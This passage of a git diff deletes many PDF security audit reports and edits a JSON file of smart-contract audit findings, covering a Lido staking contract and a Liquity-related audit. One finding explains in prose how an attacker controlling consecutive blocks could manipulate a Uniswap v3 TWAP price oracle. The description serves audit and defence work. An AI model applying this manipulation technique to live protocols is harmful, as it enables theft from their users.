b/pdfs/BeethovenXSummary.pdf deleted file mode 100644 index f50a06f..0000000 Binary files a/pdfs/BeethovenXSummary.pdf and /dev/null differ diff --git a/pdfs/CREAMSummary.pdf b/pdfs/CREAMSummary.pdf deleted file mode 100644 index 1dd4323..0000000 Binary files a/pdfs/CREAMSummary.pdf and /dev/null differ diff --git a/pdfs/CasperLabsHighwayProtocol.pdf b/pdfs/CasperLabsHighwayProtocol.pdf deleted file mode 100644 index c74c8aa..0000000 Binary files a/pdfs/CasperLabsHighwayProtocol.pdf and /dev/null differ diff --git a/pdfs/CasperLedger.pdf b/pdfs/CasperLedger.pdf deleted file mode 100644 index 497c8d7..0000000 Binary files a/pdfs/CasperLedger.pdf and /dev/null differ diff --git a/pdfs/CloudEvents.pdf b/pdfs/CloudEvents.pdf deleted file mode 100644 index b9664f3..0000000 Binary files a/pdfs/CloudEvents.pdf and /dev/null differ diff --git a/pdfs/CompliFi.pdf b/pdfs/CompliFi.pdf deleted file mode 100644 index e76a7f0..0000000 Binary files a/pdfs/CompliFi.pdf and /dev/null differ diff --git a/pdfs/CoreDNS.pdf b/pdfs/CoreDNS.pdf deleted file mode 100644 index 3dc88c4..0000000 Binary files a/pdfs/CoreDNS.pdf and /dev/null differ diff --git a/pdfs/CurveDAO.pdf b/pdfs/CurveDAO.pdf deleted file mode 100644 index ea6561b..0000000 Binary files a/pdfs/CurveDAO.pdf and /dev/null differ diff --git a/pdfs/DFINITY.pdf b/pdfs/DFINITY.pdf deleted file mode 100644 index 673091c..0000000 Binary files a/pdfs/DFINITY.pdf and /dev/null differ diff --git a/pdfs/DFINITYCanisterSandbox.pdf b/pdfs/DFINITYCanisterSandbox.pdf deleted file mode 100644 index 3580685..0000000 Binary files a/pdfs/DFINITYCanisterSandbox.pdf and /dev/null differ diff --git a/pdfs/DFINITYCanisterSandboxFixReview.pdf b/pdfs/DFINITYCanisterSandboxFixReview.pdf deleted file mode 100644 index 4482e08..0000000 Binary files a/pdfs/DFINITYCanisterSandboxFixReview.pdf and /dev/null differ diff --git a/pdfs/DFINITYConsensus.pdf b/pdfs/DFINITYConsensus.pdf deleted file mode 100644 index 552bf43..0000000 Binary files a/pdfs/DFINITYConsensus.pdf and /dev/null differ diff --git a/pdfs/DFINITYThresholdECDSAandBtcCanisters.pdf b/pdfs/DFINITYThresholdECDSAandBtcCanisters.pdf deleted file mode 100644 index d23ae14..0000000 Binary files a/pdfs/DFINITYThresholdECDSAandBtcCanisters.pdf and /dev/null differ diff --git a/pdfs/DFINITYThresholdECDSAandBtcCanistersFixReview.pdf b/pdfs/DFINITYThresholdECDSAandBtcCanistersFixReview.pdf deleted file mode 100644 index a10d63b..0000000 Binary files a/pdfs/DFINITYThresholdECDSAandBtcCanistersFixReview.pdf and /dev/null differ diff --git a/pdfs/DeGate.pdf b/pdfs/DeGate.pdf deleted file mode 100644 index 3fa1cd0..0000000 Binary files a/pdfs/DeGate.pdf and /dev/null differ diff --git a/pdfs/EIP-1283.pdf b/pdfs/EIP-1283.pdf deleted file mode 100644 index 30687ed..0000000 Binary files a/pdfs/EIP-1283.pdf and /dev/null differ diff --git a/pdfs/ETH2DepositCLI.pdf b/pdfs/ETH2DepositCLI.pdf deleted file mode 100644 index 8eca604..0000000 Binary files a/pdfs/ETH2DepositCLI.pdf and /dev/null differ diff --git a/pdfs/Flexa.pdf b/pdfs/Flexa.pdf deleted file mode 100644 index f527608..0000000 Binary files a/pdfs/Flexa.pdf and /dev/null differ diff --git a/pdfs/FraxFinance.pdf b/pdfs/FraxFinance.pdf deleted file mode 100644 index 85be3b4..0000000 Binary files a/pdfs/FraxFinance.pdf and /dev/null differ diff --git a/pdfs/FraxQ22022.pdf b/pdfs/FraxQ22022.pdf deleted file mode 100644 index 072ab90..0000000 Binary files a/pdfs/FraxQ22022.pdf and /dev/null differ diff --git a/pdfs/FraxQ42021.pdf b/pdfs/FraxQ42021.pdf deleted file mode 100644 
index 48d1fd8..0000000 Binary files a/pdfs/FraxQ42021.pdf and /dev/null differ diff --git a/pdfs/FujiProtocol.pdf b/pdfs/FujiProtocol.pdf deleted file mode 100644 index 83556ec..0000000 Binary files a/pdfs/FujiProtocol.pdf and /dev/null differ diff --git a/pdfs/Galoy.pdf b/pdfs/Galoy.pdf deleted file mode 100644 index e35e3bf..0000000 Binary files a/pdfs/Galoy.pdf and /dev/null differ diff --git a/pdfs/Helm.pdf b/pdfs/Helm.pdf deleted file mode 100644 index 3574a53..0000000 Binary files a/pdfs/Helm.pdf and /dev/null differ diff --git a/pdfs/Hey.pdf b/pdfs/Hey.pdf deleted file mode 100644 index 1187a68..0000000 Binary files a/pdfs/Hey.pdf and /dev/null differ diff --git a/pdfs/LedgerFilecoin.pdf b/pdfs/LedgerFilecoin.pdf deleted file mode 100644 index 95c0b9a..0000000 Binary files a/pdfs/LedgerFilecoin.pdf and /dev/null differ diff --git a/pdfs/Linkerd-fixreview.pdf b/pdfs/Linkerd-fixreview.pdf deleted file mode 100644 index ca30625..0000000 Binary files a/pdfs/Linkerd-fixreview.pdf and /dev/null differ diff --git a/pdfs/Linkerd-securityreview.pdf b/pdfs/Linkerd-securityreview.pdf deleted file mode 100644 index b243e15..0000000 Binary files a/pdfs/Linkerd-securityreview.pdf and /dev/null differ diff --git a/pdfs/Linkerd-threatmodel.pdf b/pdfs/Linkerd-threatmodel.pdf deleted file mode 100644 index 96fcd10..0000000 Binary files a/pdfs/Linkerd-threatmodel.pdf and /dev/null differ diff --git a/pdfs/LinuxKernelReleaseSigning.pdf b/pdfs/LinuxKernelReleaseSigning.pdf deleted file mode 100644 index 57080cd..0000000 Binary files a/pdfs/LinuxKernelReleaseSigning.pdf and /dev/null differ diff --git a/pdfs/Liquity.pdf b/pdfs/Liquity.pdf deleted file mode 100644 index 18dae9a..0000000 Binary files a/pdfs/Liquity.pdf and /dev/null differ diff --git a/pdfs/LiquityProtocolandStabilityPoolFinalReport.pdf b/pdfs/LiquityProtocolandStabilityPoolFinalReport.pdf deleted file mode 100644 index f698c15..0000000 Binary files a/pdfs/LiquityProtocolandStabilityPoolFinalReport.pdf and /dev/null differ diff --git a/pdfs/LiquityProxyContracts.pdf b/pdfs/LiquityProxyContracts.pdf deleted file mode 100644 index 62ea7f0..0000000 Binary files a/pdfs/LiquityProxyContracts.pdf and /dev/null differ diff --git a/pdfs/LooksRare.pdf b/pdfs/LooksRare.pdf deleted file mode 100644 index 037d172..0000000 Binary files a/pdfs/LooksRare.pdf and /dev/null differ diff --git a/pdfs/MagmaWallet.pdf b/pdfs/MagmaWallet.pdf deleted file mode 100644 index 532ecc7..0000000 Binary files a/pdfs/MagmaWallet.pdf and /dev/null differ diff --git a/pdfs/MapleFinance.pdf b/pdfs/MapleFinance.pdf deleted file mode 100644 index 219ba4d..0000000 Binary files a/pdfs/MapleFinance.pdf and /dev/null differ diff --git a/pdfs/MesonProtocol.pdf b/pdfs/MesonProtocol.pdf deleted file mode 100644 index 1468a77..0000000 Binary files a/pdfs/MesonProtocol.pdf and /dev/null differ diff --git a/pdfs/MesonProtocolDesignReview.pdf b/pdfs/MesonProtocolDesignReview.pdf deleted file mode 100644 index 13a9cae..0000000 Binary files a/pdfs/MesonProtocolDesignReview.pdf and /dev/null differ diff --git a/pdfs/MesonProtocolFixReview.pdf b/pdfs/MesonProtocolFixReview.pdf deleted file mode 100644 index a13bfaa..0000000 Binary files a/pdfs/MesonProtocolFixReview.pdf and /dev/null differ diff --git a/pdfs/Microsoft-go-cose.pdf b/pdfs/Microsoft-go-cose.pdf deleted file mode 100644 index ff01c2b..0000000 Binary files a/pdfs/Microsoft-go-cose.pdf and /dev/null differ diff --git a/pdfs/MobileCoinBFT.pdf b/pdfs/MobileCoinBFT.pdf deleted file mode 100644 index 6dffc16..0000000 Binary files 
a/pdfs/MobileCoinBFT.pdf and /dev/null differ diff --git a/pdfs/Mobilecoin.pdf b/pdfs/Mobilecoin.pdf deleted file mode 100644 index d77995b..0000000 Binary files a/pdfs/Mobilecoin.pdf and /dev/null differ diff --git a/pdfs/MobilecoinFog.pdf b/pdfs/MobilecoinFog.pdf deleted file mode 100644 index f2cc27a..0000000 Binary files a/pdfs/MobilecoinFog.pdf and /dev/null differ diff --git a/pdfs/MorphoLabs.pdf b/pdfs/MorphoLabs.pdf deleted file mode 100644 index 54f5eaf..0000000 Binary files a/pdfs/MorphoLabs.pdf and /dev/null differ diff --git a/pdfs/NFTX.pdf b/pdfs/NFTX.pdf deleted file mode 100644 index 5a50233..0000000 Binary files a/pdfs/NFTX.pdf and /dev/null differ diff --git a/pdfs/NervosSUDT.pdf b/pdfs/NervosSUDT.pdf deleted file mode 100644 index fc05a39..0000000 Binary files a/pdfs/NervosSUDT.pdf and /dev/null differ diff --git a/pdfs/OPAGatekeeper.pdf b/pdfs/OPAGatekeeper.pdf deleted file mode 100644 index 12c17f4..0000000 Binary files a/pdfs/OPAGatekeeper.pdf and /dev/null differ diff --git a/pdfs/Opyn-Gamma-Protocol.pdf b/pdfs/Opyn-Gamma-Protocol.pdf deleted file mode 100644 index 2df0a3e..0000000 Binary files a/pdfs/Opyn-Gamma-Protocol.pdf and /dev/null differ diff --git a/pdfs/Opyn.pdf b/pdfs/Opyn.pdf deleted file mode 100644 index 85729c6..0000000 Binary files a/pdfs/Opyn.pdf and /dev/null differ diff --git a/pdfs/OriginDollar.pdf b/pdfs/OriginDollar.pdf deleted file mode 100644 index f70768a..0000000 Binary files a/pdfs/OriginDollar.pdf and /dev/null differ diff --git a/pdfs/ParallelFinance.pdf b/pdfs/ParallelFinance.pdf deleted file mode 100644 index 0f2be95..0000000 Binary files a/pdfs/ParallelFinance.pdf and /dev/null differ diff --git a/pdfs/ParallelFinance2.pdf b/pdfs/ParallelFinance2.pdf deleted file mode 100644 index dbd14a7..0000000 Binary files a/pdfs/ParallelFinance2.pdf and /dev/null differ diff --git a/pdfs/ParallelFinance2FixReview.pdf b/pdfs/ParallelFinance2FixReview.pdf deleted file mode 100644 index 4874c44..0000000 Binary files a/pdfs/ParallelFinance2FixReview.pdf and /dev/null differ diff --git a/pdfs/ParallelFinance3.pdf b/pdfs/ParallelFinance3.pdf deleted file mode 100644 index f8f0ef9..0000000 Binary files a/pdfs/ParallelFinance3.pdf and /dev/null differ diff --git a/pdfs/PerpetualProtocolV2.pdf b/pdfs/PerpetualProtocolV2.pdf deleted file mode 100644 index 07c232d..0000000 Binary files a/pdfs/PerpetualProtocolV2.pdf and /dev/null differ diff --git a/pdfs/Primitive.pdf b/pdfs/Primitive.pdf deleted file mode 100644 index 256dca3..0000000 Binary files a/pdfs/Primitive.pdf and /dev/null differ diff --git a/pdfs/RSKj.pdf b/pdfs/RSKj.pdf deleted file mode 100644 index 91f0186..0000000 Binary files a/pdfs/RSKj.pdf and /dev/null differ diff --git a/pdfs/Reserve_LOA.pdf b/pdfs/Reserve_LOA.pdf deleted file mode 100644 index 301181b..0000000 Binary files a/pdfs/Reserve_LOA.pdf and /dev/null differ diff --git a/pdfs/RocketPool.pdf b/pdfs/RocketPool.pdf deleted file mode 100644 index d275d03..0000000 Binary files a/pdfs/RocketPool.pdf and /dev/null differ diff --git a/pdfs/SeaportProtocol.pdf b/pdfs/SeaportProtocol.pdf deleted file mode 100644 index 7d80009..0000000 Binary files a/pdfs/SeaportProtocol.pdf and /dev/null differ diff --git a/pdfs/SecureDropWorkstation.pdf b/pdfs/SecureDropWorkstation.pdf deleted file mode 100644 index ef9ab03..0000000 Binary files a/pdfs/SecureDropWorkstation.pdf and /dev/null differ diff --git a/pdfs/ShellProtocolv2.pdf b/pdfs/ShellProtocolv2.pdf deleted file mode 100644 index 2ca9fe6..0000000 Binary files a/pdfs/ShellProtocolv2.pdf and 
/dev/null differ diff --git a/pdfs/Sherlockv2.pdf b/pdfs/Sherlockv2.pdf deleted file mode 100644 index 74cdd79..0000000 Binary files a/pdfs/Sherlockv2.pdf and /dev/null differ diff --git a/pdfs/SimpleXChat.pdf b/pdfs/SimpleXChat.pdf deleted file mode 100644 index 4f6fa9c..0000000 Binary files a/pdfs/SimpleXChat.pdf and /dev/null differ diff --git a/pdfs/SpruceID.pdf b/pdfs/SpruceID.pdf deleted file mode 100644 index 02726d0..0000000 Binary files a/pdfs/SpruceID.pdf and /dev/null differ diff --git a/pdfs/StandardNotes.pdf b/pdfs/StandardNotes.pdf deleted file mode 100644 index 60b6172..0000000 Binary files a/pdfs/StandardNotes.pdf and /dev/null differ diff --git a/pdfs/SweetB.pdf b/pdfs/SweetB.pdf deleted file mode 100644 index 1b30d50..0000000 Binary files a/pdfs/SweetB.pdf and /dev/null differ diff --git a/pdfs/Symbol.pdf b/pdfs/Symbol.pdf deleted file mode 100644 index f3f20d4..0000000 Binary files a/pdfs/Symbol.pdf and /dev/null differ diff --git a/pdfs/Tekton.pdf b/pdfs/Tekton.pdf deleted file mode 100644 index 970f718..0000000 Binary files a/pdfs/Tekton.pdf and /dev/null differ diff --git a/pdfs/Tezori.pdf b/pdfs/Tezori.pdf deleted file mode 100644 index cf61fde..0000000 Binary files a/pdfs/Tezori.pdf and /dev/null differ diff --git a/pdfs/TokenCard.pdf b/pdfs/TokenCard.pdf deleted file mode 100644 index 5e4a880..0000000 Binary files a/pdfs/TokenCard.pdf and /dev/null differ diff --git a/pdfs/Umee.pdf b/pdfs/Umee.pdf deleted file mode 100644 index 640a08a..0000000 Binary files a/pdfs/Umee.pdf and /dev/null differ diff --git a/pdfs/UniswapMobileWallet-fixreview.pdf b/pdfs/UniswapMobileWallet-fixreview.pdf deleted file mode 100644 index 7563ac6..0000000 Binary files a/pdfs/UniswapMobileWallet-fixreview.pdf and /dev/null differ diff --git a/pdfs/UniswapMobileWallet-securityreview.pdf b/pdfs/UniswapMobileWallet-securityreview.pdf deleted file mode 100644 index 3e6c800..0000000 Binary files a/pdfs/UniswapMobileWallet-securityreview.pdf and /dev/null differ diff --git a/pdfs/UniswapV3Core.pdf b/pdfs/UniswapV3Core.pdf deleted file mode 100644 index 7ea6076..0000000 Binary files a/pdfs/UniswapV3Core.pdf and /dev/null differ diff --git a/pdfs/WorkLock-Summary.pdf b/pdfs/WorkLock-Summary.pdf deleted file mode 100644 index 534a933..0000000 Binary files a/pdfs/WorkLock-Summary.pdf and /dev/null differ diff --git a/pdfs/YearnV2Vaults.pdf b/pdfs/YearnV2Vaults.pdf deleted file mode 100644 index d91066b..0000000 Binary files a/pdfs/YearnV2Vaults.pdf and /dev/null differ diff --git a/pdfs/YieldProtocol.pdf b/pdfs/YieldProtocol.pdf deleted file mode 100644 index 847289b..0000000 Binary files a/pdfs/YieldProtocol.pdf and /dev/null differ diff --git a/pdfs/YieldV2.pdf b/pdfs/YieldV2.pdf deleted file mode 100644 index 36735b8..0000000 Binary files a/pdfs/YieldV2.pdf and /dev/null differ diff --git a/pdfs/Zcash.pdf b/pdfs/Zcash.pdf deleted file mode 100644 index 11821fd..0000000 Binary files a/pdfs/Zcash.pdf and /dev/null differ diff --git a/pdfs/Zcash2.pdf b/pdfs/Zcash2.pdf deleted file mode 100644 index 7440d32..0000000 Binary files a/pdfs/Zcash2.pdf and /dev/null differ diff --git a/pdfs/ZcashWP.pdf b/pdfs/ZcashWP.pdf deleted file mode 100644 index 9e7dd15..0000000 Binary files a/pdfs/ZcashWP.pdf and /dev/null differ diff --git a/pdfs/ZeroTierProtocol.pdf b/pdfs/ZeroTierProtocol.pdf deleted file mode 100644 index 9e380af..0000000 Binary files a/pdfs/ZeroTierProtocol.pdf and /dev/null differ diff --git a/pdfs/aaveprotocol.pdf b/pdfs/aaveprotocol.pdf deleted file mode 100644 index efb1222..0000000 Binary 
files a/pdfs/aaveprotocol.pdf and /dev/null differ diff --git a/pdfs/amp.pdf b/pdfs/amp.pdf deleted file mode 100644 index 744aa9f..0000000 Binary files a/pdfs/amp.pdf and /dev/null differ diff --git a/pdfs/ampleforth.pdf b/pdfs/ampleforth.pdf deleted file mode 100644 index 1c8e575..0000000 Binary files a/pdfs/ampleforth.pdf and /dev/null differ diff --git a/pdfs/argo-securityreview.pdf b/pdfs/argo-securityreview.pdf deleted file mode 100644 index 5b9bdc6..0000000 Binary files a/pdfs/argo-securityreview.pdf and /dev/null differ diff --git a/pdfs/argo-threatmodel.pdf b/pdfs/argo-threatmodel.pdf deleted file mode 100644 index 430668a..0000000 Binary files a/pdfs/argo-threatmodel.pdf and /dev/null differ diff --git a/pdfs/arweave-randomx.pdf b/pdfs/arweave-randomx.pdf deleted file mode 100644 index bc282e5..0000000 Binary files a/pdfs/arweave-randomx.pdf and /dev/null differ diff --git a/pdfs/aztec.pdf b/pdfs/aztec.pdf deleted file mode 100644 index 8a8fa89..0000000 Binary files a/pdfs/aztec.pdf and /dev/null differ diff --git a/pdfs/basis.pdf b/pdfs/basis.pdf deleted file mode 100644 index 91abeed..0000000 Binary files a/pdfs/basis.pdf and /dev/null differ diff --git a/pdfs/chai-loa.pdf b/pdfs/chai-loa.pdf deleted file mode 100644 index b463440..0000000 Binary files a/pdfs/chai-loa.pdf and /dev/null differ diff --git a/pdfs/compound-2.pdf b/pdfs/compound-2.pdf deleted file mode 100644 index dd4fbe9..0000000 Binary files a/pdfs/compound-2.pdf and /dev/null differ diff --git a/pdfs/compound-3.pdf b/pdfs/compound-3.pdf deleted file mode 100644 index 606fc52..0000000 Binary files a/pdfs/compound-3.pdf and /dev/null differ diff --git a/pdfs/compound-governance.pdf b/pdfs/compound-governance.pdf deleted file mode 100644 index 0f9c649..0000000 Binary files a/pdfs/compound-governance.pdf and /dev/null differ diff --git a/pdfs/computable.pdf b/pdfs/computable.pdf deleted file mode 100644 index c45f451..0000000 Binary files a/pdfs/computable.pdf and /dev/null differ diff --git a/pdfs/curve-summary.pdf b/pdfs/curve-summary.pdf deleted file mode 100644 index 61f7180..0000000 Binary files a/pdfs/curve-summary.pdf and /dev/null differ diff --git a/pdfs/dapphub.pdf b/pdfs/dapphub.pdf deleted file mode 100644 index 03b468d..0000000 Binary files a/pdfs/dapphub.pdf and /dev/null differ diff --git a/pdfs/dedaub-audits b/pdfs/dedaub-audits index 801ad04..010acc5 160000 --- a/pdfs/dedaub-audits +++ b/pdfs/dedaub-audits @@ -1 +1 @@ -Subproject commit 801ad041d3cd0dc0ee52027141017bc6b7ea32ed +Subproject commit 010acc566478bff446e8a17e6638671e6b275a00 diff --git a/pdfs/dexter.pdf b/pdfs/dexter.pdf deleted file mode 100644 index ea62105..0000000 Binary files a/pdfs/dexter.pdf and /dev/null differ diff --git a/pdfs/dharma-smartwallet.pdf b/pdfs/dharma-smartwallet.pdf deleted file mode 100644 index b482c3b..0000000 Binary files a/pdfs/dharma-smartwallet.pdf and /dev/null differ diff --git a/pdfs/dodo.pdf b/pdfs/dodo.pdf deleted file mode 100644 index 108ef19..0000000 Binary files a/pdfs/dodo.pdf and /dev/null differ diff --git a/pdfs/dtoken.pdf b/pdfs/dtoken.pdf deleted file mode 100644 index 4cfca6f..0000000 Binary files a/pdfs/dtoken.pdf and /dev/null differ diff --git a/pdfs/etcd.pdf b/pdfs/etcd.pdf deleted file mode 100644 index edd829c..0000000 Binary files a/pdfs/etcd.pdf and /dev/null differ diff --git a/pdfs/gemini-dollar.pdf b/pdfs/gemini-dollar.pdf deleted file mode 100644 index 0da9c6b..0000000 Binary files a/pdfs/gemini-dollar.pdf and /dev/null differ diff --git a/pdfs/golem.pdf b/pdfs/golem.pdf deleted 
file mode 100644 index a6e54b7..0000000 Binary files a/pdfs/golem.pdf and /dev/null differ diff --git a/pdfs/hegic-summary.pdf b/pdfs/hegic-summary.pdf deleted file mode 100644 index 1090ad8..0000000 Binary files a/pdfs/hegic-summary.pdf and /dev/null differ diff --git a/pdfs/hermez.pdf b/pdfs/hermez.pdf deleted file mode 100644 index d01767a..0000000 Binary files a/pdfs/hermez.pdf and /dev/null differ diff --git a/pdfs/livepeer.pdf b/pdfs/livepeer.pdf deleted file mode 100644 index 6904f91..0000000 Binary files a/pdfs/livepeer.pdf and /dev/null differ diff --git a/pdfs/mc-dai.pdf b/pdfs/mc-dai.pdf deleted file mode 100644 index d19c044..0000000 Binary files a/pdfs/mc-dai.pdf and /dev/null differ diff --git a/pdfs/nucypher-2.pdf b/pdfs/nucypher-2.pdf deleted file mode 100644 index 70ef11c..0000000 Binary files a/pdfs/nucypher-2.pdf and /dev/null differ diff --git a/pdfs/nucypher.pdf b/pdfs/nucypher.pdf deleted file mode 100644 index bdbe785..0000000 Binary files a/pdfs/nucypher.pdf and /dev/null differ diff --git a/pdfs/numerai.pdf b/pdfs/numerai.pdf deleted file mode 100644 index b8ec48e..0000000 Binary files a/pdfs/numerai.pdf and /dev/null differ diff --git a/pdfs/origin.pdf b/pdfs/origin.pdf deleted file mode 100644 index 33a6403..0000000 Binary files a/pdfs/origin.pdf and /dev/null differ diff --git a/pdfs/osquery.pdf b/pdfs/osquery.pdf deleted file mode 100644 index cf37d31..0000000 Binary files a/pdfs/osquery.pdf and /dev/null differ diff --git a/pdfs/pantheon.pdf b/pdfs/pantheon.pdf deleted file mode 100644 index fe9a5b4..0000000 Binary files a/pdfs/pantheon.pdf and /dev/null differ diff --git a/pdfs/parity.pdf b/pdfs/parity.pdf deleted file mode 100644 index c62befd..0000000 Binary files a/pdfs/parity.pdf and /dev/null differ diff --git a/pdfs/paxos.pdf b/pdfs/paxos.pdf deleted file mode 100644 index d85e908..0000000 Binary files a/pdfs/paxos.pdf and /dev/null differ diff --git a/pdfs/publications b/pdfs/publications new file mode 160000 index 0000000..3efd335 --- /dev/null +++ b/pdfs/publications @@ -0,0 +1 @@ +Subproject commit 3efd3357812e00ff510136756b522bdf7b66abe8 diff --git a/pdfs/qtum_loa.pdf b/pdfs/qtum_loa.pdf deleted file mode 100644 index 7ef7f5a..0000000 Binary files a/pdfs/qtum_loa.pdf and /dev/null differ diff --git a/pdfs/renvm.pdf b/pdfs/renvm.pdf deleted file mode 100644 index e44264d..0000000 Binary files a/pdfs/renvm.pdf and /dev/null differ diff --git a/pdfs/rook.pdf b/pdfs/rook.pdf deleted file mode 100644 index ae3d17e..0000000 Binary files a/pdfs/rook.pdf and /dev/null differ diff --git a/pdfs/sai.pdf b/pdfs/sai.pdf deleted file mode 100644 index 1e3348a..0000000 Binary files a/pdfs/sai.pdf and /dev/null differ diff --git a/pdfs/sandiskx600.pdf b/pdfs/sandiskx600.pdf deleted file mode 100644 index 58e50ad..0000000 Binary files a/pdfs/sandiskx600.pdf and /dev/null differ diff --git a/pdfs/setprotocol.pdf b/pdfs/setprotocol.pdf deleted file mode 100644 index a60c7ee..0000000 Binary files a/pdfs/setprotocol.pdf and /dev/null differ diff --git a/pdfs/spearbit-reports b/pdfs/spearbit-reports index 0063c52..e9098b7 160000 --- a/pdfs/spearbit-reports +++ b/pdfs/spearbit-reports @@ -1 +1 @@ -Subproject commit 0063c526418d22d3fadb9729bcb1747d5024dac7 +Subproject commit e9098b7517b0bf2a5946b8b1219b8758f9fdf3ec diff --git a/pdfs/thesis-summary.pdf b/pdfs/thesis-summary.pdf deleted file mode 100644 index 8409a05..0000000 Binary files a/pdfs/thesis-summary.pdf and /dev/null differ diff --git a/pdfs/voatz-securityreview.pdf b/pdfs/voatz-securityreview.pdf deleted file 
mode 100644 index 114358e..0000000 Binary files a/pdfs/voatz-securityreview.pdf and /dev/null differ diff --git a/pdfs/voatz-threatmodel.pdf b/pdfs/voatz-threatmodel.pdf deleted file mode 100644 index ba97662..0000000 Binary files a/pdfs/voatz-threatmodel.pdf and /dev/null differ diff --git a/pdfs/wALGO.pdf b/pdfs/wALGO.pdf deleted file mode 100644 index 6281f4e..0000000 Binary files a/pdfs/wALGO.pdf and /dev/null differ diff --git a/pdfs/wXTZ.pdf b/pdfs/wXTZ.pdf deleted file mode 100644 index 93709f5..0000000 Binary files a/pdfs/wXTZ.pdf and /dev/null differ diff --git a/pdfs/zcoin-lelantus-summary.pdf b/pdfs/zcoin-lelantus-summary.pdf deleted file mode 100644 index a038bb0..0000000 Binary files a/pdfs/zcoin-lelantus-summary.pdf and /dev/null differ diff --git a/pdfs/zecwallet.pdf b/pdfs/zecwallet.pdf deleted file mode 100644 index bf1d408..0000000 Binary files a/pdfs/zecwallet.pdf and /dev/null differ diff --git a/pdfs/zlib.pdf b/pdfs/zlib.pdf deleted file mode 100644 index f78f022..0000000 Binary files a/pdfs/zlib.pdf and /dev/null differ diff --git a/results/dedaub_findings.json b/results/dedaub_findings.json index 8c3955a..9924a68 100644 --- a/results/dedaub_findings.json +++ b/results/dedaub_findings.json @@ -50,1122 +50,922 @@ ] }, { - "title": "might misbehave if bufferedRedeems != fundRaisedBalance", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido on Kusama,Polkadot Liquid Staking Delta Audit - Apr 2023.pdf", - "body": " RESOLVED The intended procedure of forced unbond requires setting bufferedRedeems == fundRaisedBalance via a call to setBufferedRedeems. As a consequence, LidoUnbond::_processEnabled expects these two amounts to be equal during forced unbond. function _processEnabled(int256 _stake) internal { ... // Dedaub: This code will break if bufferedRedeems is not exactly equal to fundRaisedBalance if (isUnbondForced && isRedeemDisabled && bufferedRedeems == fundRaisedBalance) { targetStake = 0; } else { targetStake = getTotalPooledKSM() / ledgersLength; } } However, the contract does not guarantee that these amounts will be exactly equal. For instance, setBufferedRedeems only contains an inequality check: function setBufferedRedeems( uint256 _bufferedRedeems ) external redeemDisabled auth(ROLE_BEACON_MANAGER) { // Dedaub: Equality not guaranteed require(_bufferedRedeems <= fundRaisedBalance, "LIDO: VALUE_TOO_BIG"); bufferedRedeems = _bufferedRedeems; } It is also hard to verify that no other function modifying these amounts can be called after calling setBufferedRedeems. If, for any reason, the amounts are not exactly equal during forced unbond, the else branch in _processEnabled will be executed, causing targetStake to be wrongly computed and likely leaving the contract in a problematic state. To make the contract more robust we recommend properly handling the case when the two amounts are different, possibly by reverting, instead of executing the wrong branch. For instance: function _processEnabled(int256 _stake) internal { ... // Dedaub: Modified code if (isUnbondForced && isRedeemDisabled) { require(bufferedRedeems == fundRaisedBalance); targetStake = 0; } else { targetStake = getTotalPooledKSM() / ledgersLength; } } Another approach could be to actually set _bufferedRedeems = fundRaisedBalance within this function.
L2 Set bufferedRedeems = fundRaisedBalance and isUnbondForced in a single transaction RESOLVED Forced unbond is initiated by setting bufferedRedeems = fundRaisedBalance and isUnbondForced = true, via separate calls to setIsUnbondForced and setBufferedRedeems. If, however, only one of the two changes is performed, the contract will likely misbehave. As a consequence, it would be safer to perform both updates in a single transaction. OTHER/ADVISORY ISSUES: This section details issues that are not thought to directly affect the functionality of the project, but we recommend addressing them. ", "labels": [ "Dedaub", "Lido on Kusama,Polkadot Liquid Staking Delta", "Severity: Low" ] }, { "title": "and check all contracts before starting the forced unbond procedure ", "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido on Kusama,Polkadot Liquid Staking Delta Audit - Apr 2023.pdf", "body": " INFO The documented procedure for enabling forced unbond states to first update the Ledger contract, then to chill all Ledgers, and afterwards to upgrade the Lido contract.
Although this order can work, we find it safer to first finish all upgrades of all contracts, check that the upgraded contracts work by simulating calls to the corresponding methods, and only then perform any state updating calls.", "labels": [ "Dedaub", "Lido on Kusama,Polkadot Liquid Staking Delta", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido on Kusama,Polkadot Liquid Staking Delta Audit - Apr 2023.pdf", "body": "function name in ILidoUnbond RESOLVED ILidoUnbond contains a function setIsRedeemEnabled, while the method in LidoUnbond is called setIsRedeemDisabled. A3 Compiler known issues INFO The code is compiled with Solidity 0.8.0 or higher. For deployment, we recommend no floating pragmas, i.e., a specific version, to be confident about the baseline guarantees offered by the compiler. Version 0.8.0, in particular, has some known bugs, which we do not believe affect the correctness of the contracts.", "labels": [ "Dedaub", "Lido on Kusama,Polkadot Liquid Staking Delta", "Severity: Informational" ] }, { "title": "v3 TWAPs can be manipulated, and this will become much easier post-Merge DISMISSED A Uniswap v3 TWAP is expected to be used to price LQTY relative to ETH. Uniswap v3 TWAPs can be manipulated, especially for less-used pools. (There have been at least three instances of attacks already, for pools with liquidity in the low millions. The LQTY-ETH pool currently has $780K of liquidity.) Although currently manipulation for active pools is considered rarely profitable, once Ethereum switches to proof-of-stake (colloquially, after the Merge) such manipulation will be much easier to perform with guaranteed profit. Specifically, to manipulate a data point used for a Uniswap v3 TWAP, an attacker needs to control two consecutive pool transactions (i.e., transactions over the manipulated pool) that are in separate blocks. (This typically means the last pool transaction of a block and the first of the next block.) Under Ethereum proof-of-stake, validators are known in advance (at the beginning of the epoch), hence an attacker can know when they are guaranteed to control the validator of the next block. The attack is: The attacker places the first transaction as the last pool transaction of the previous block (either by being the validator of both blocks or using flashbots). The first transaction tilts the pool. The attacker is guaranteed to not suffer any losses from swaps at the unrealistic price of the tilted pool, because the attacker controls the immediately next block, prepending to it a transaction that restores the pool, while affecting a TWAP data point in this way. The issue is at most medium-severity, because it only concerns selling LQTY, not the principal assets of the contracts. M3 Values from Chainlink are not checked DISMISSED The protocol does not check whether the LUSD-USD price is successfully returned from Chainlink in BAMM::compensateForLusdDeviation and GemSeller::compensateForLusdDeviation. Since this price is used to adjust the amount of ETH or LQTY returned by a swap in BAMM and GemSeller respectively, it is important to ensure that the values from Chainlink are accurate and correct. This is in contrast with how Chainlink ETH-USD prices are retrieved in BAMM::fetchPrice and GemSeller::fetchPrice, where each call to Chainlink is checked and any failures are reported using a return value of 0. LOW SEVERITY: [No low severity issues] CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocol's owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues 